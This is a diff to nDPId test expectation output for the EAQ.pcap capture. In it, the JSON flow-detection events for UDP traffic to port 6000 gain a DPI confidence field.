 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1432820971265,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820971265,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07IKCAAByMKUQ8lxF3AAGL1RAAAAAQAADdsAAlydAACQAA=="}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949735,"flow_last_seen":1432820971335,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949735,"flow_last_seen":1432820971335,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971335,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.67","src_port":51569,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1432820971335,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820971335,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07MKCAAByMKUQqZ8F3AAGKzSAAAAAQAADdsABZAPAACQAA=="}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950801,"flow_last_seen":1432820971405,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950801,"flow_last_seen":1432820971405,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971405,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.66","src_port":42620,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1432820971406,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820971406,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR07EKCAAByMKURKp5F3AAGJfzAAAAAQAADdsABqDuAACQAA=="}
-00598{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950865,"flow_last_seen":1432820971475,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971475,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950865,"flow_last_seen":1432820971475,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820971475,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.148.68","src_port":43641,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1432820971475,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820971475,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rMKCAAByMKNQqHeF3AAGIJFAAAAAQAADdwAAsY8AACQAA=="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1432820972471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820972471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rEKCAAByMKNRId\/F3AAGLwmAAAAAQAADdwABaa1AACQAA=="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820973471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820973471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR3rIKCAAByMKJQ5k1F3AAGK1eAAAAAQAADdwABafIAACQAA=="}
@@ -94,12 +94,12 @@
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1432820977471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820977471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR5rMKCAAByMKBQr4aF3AAGPN5AAAAAQAADdwABkTIAACQAA=="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1432820978471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820978471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR5rEKCAAByMKBRLpiF3AAGNEoAAAAAQAADdwABmrPAACQAA=="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1432820979471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820979471,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47MKCAAByMKEQqvLF3AAGLWJAAAAAQAADdwABpIHAACQAA=="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957932,"flow_last_seen":1432820979565,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820979565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":80,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957932,"flow_last_seen":1432820979565,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820979565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.66","src_port":43979,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1432820979565,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820979565,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR2rIKCAAByMKNQ72zF3AAGJmsAAAAAQAADdwABpL7AACQAA=="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1432820980561,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820980561,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47IKCAAByMKEQ5kRF3AAGFMTAAAAAQAADdwABwc2AACQAA=="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820958981,"flow_last_seen":1432820980615,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820980615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":83,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820958981,"flow_last_seen":1432820980615,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820980615,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.67","src_port":39185,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1432820980615,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820980615,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR47EKCAAByMKERM32F3AAGHylAAAAAQAADdwAB6i9AACQAA=="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959035,"flow_last_seen":1432820980685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820980685,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
+00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959035,"flow_last_seen":1432820980685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432820980685,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.132.68","src_port":52726,"dst_port":6000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"EAQ","breed":"Acceptable","category":"Network"}}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1432820980685,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820980685,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rMKCAAByMKFQttAF3AAGE3SAAAAAQAADdwAB8lIAACQAA=="}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1432820981681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820981681,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rIKCAAByMKFQ96sF3AAGCMsAAAAAQAADdwAB\/CBAACQAA=="}
 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1432820982681,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432820982681,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4rEKCAAByMKFRM9DF3AAGCE7AAAAAQAADdwACQHZAACQAA=="}
@@ -133,65 +133,65 @@
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1432821011311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432821011311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR37IKCAAByMKIQ+ptF3AAGKMiAAAAAgAADd4ADGHCAACQAA=="}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1432821012311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432821012311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR0rMKCAAByMKVQoJMF3AAGLfNAAAAAgAADd4ADqg3AACQAA=="}
 00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1432821013311,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"ts_msec":1432821013311,"pkt":"ABoRAAACABoRAAABCABFAAAsAABAAEAR4bIKCAAByMKGQ5x6F3AAGKtOAAAAAgAADd4ADqmHAACQAA=="}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820949806,"flow_last_seen":1432821014655,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821014655,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.66","src_port":41438,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00599{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820950935,"flow_last_seen":1432821015651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821015651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.68","src_port":34687,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820951932,"flow_last_seen":1432821016651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821016651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.67","src_port":39221,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820952931,"flow_last_seen":1432821017651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821017651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.66","src_port":53354,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820953931,"flow_last_seen":1432821018651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821018651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.137.68","src_port":59959,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820954931,"flow_last_seen":1432821019651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821019651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.67","src_port":37985,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820955933,"flow_last_seen":1432821020651,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821020651,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.66","src_port":48666,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820956931,"flow_last_seen":1432821021652,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821021652,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.129.68","src_port":47714,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820957985,"flow_last_seen":1432821022695,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821022695,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.141.67","src_port":48563,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820959095,"flow_last_seen":1432821023795,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821023795,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.66","src_port":56128,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820960101,"flow_last_seen":1432821024791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821024791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.67","src_port":57004,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820962101,"flow_last_seen":1432821025791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821025791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.66","src_port":36552,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820961101,"flow_last_seen":1432821026791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821026791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.133.68","src_port":53059,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820963101,"flow_last_seen":1432821027791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821027791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.136.68","src_port":43934,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820964101,"flow_last_seen":1432821028791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821028791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.66","src_port":47346,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820965101,"flow_last_seen":1432821029791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821029791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.134.68","src_port":59098,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820966101,"flow_last_seen":1432821030791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821030791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.67","src_port":50175,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
-00600{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"EAQ.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820967101,"flow_last_seen":1432821031791,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1432821031791,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.194.149.68","src_port":36577,"dst_port":6000,"l4_proto":"udp","ndpi": {"proto":"EAQ","breed":"Acceptable","category":"Network"}}
